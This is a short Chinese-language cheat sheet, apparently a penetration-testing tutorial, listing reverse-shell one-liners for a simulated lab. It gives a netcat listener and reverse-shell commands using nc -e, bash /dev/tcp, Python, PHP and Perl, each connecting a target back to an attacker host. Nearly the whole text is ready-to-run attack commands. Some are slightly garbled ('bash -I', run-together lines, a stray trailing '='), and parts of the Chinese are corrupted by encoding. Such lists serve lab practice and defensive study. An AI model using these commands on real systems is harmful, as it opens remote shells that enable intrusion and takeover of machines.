1、實驗環(huán)境

　　Kali:192.168.32.132 //模擬靶機(jī)

　　Windows:192.168.32.1 //模擬公網(wǎng)vps

　　2、若靶機(jī)上存在nc，獲取反向shell：

　　vps攻擊機(jī)：nc -lvp 9999 // 監(jiān)聽9999端口

　　靶機(jī)：nc 1.1.1.1 9999 -e /bin/bash // Linux正向連接公網(wǎng)vps1.1.1.1的9999端口

　　nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows

　　3、若靶機(jī)上不存在nc，可用如下幾種方式進(jìn)行代替：

　　(1) Bash反彈shell

　　vps攻擊機(jī)：nc -lvp 6666靶機(jī)：bash -I >& /dev/tcp/192.168.32.1/6666 0>&1

　　(2)靶機(jī)存在Python環(huán)境，Python反彈shell

　　vps攻擊機(jī)：nc -lvp 6666靶機(jī)：python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.1",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

　　(3)靶機(jī)存在PHP環(huán)境，PHP反向shell：

　　vps攻擊機(jī)：nc -lvp 6666靶機(jī)：php -r '$sock=fsockopen("192.168.32.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

　　(4)靶機(jī)存在Perl環(huán)境，Perl反彈shell：

　　Vps攻擊機(jī)：nc -lvp 6666靶機(jī)：perl -e 'use Socket; $i="192.168.32.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'=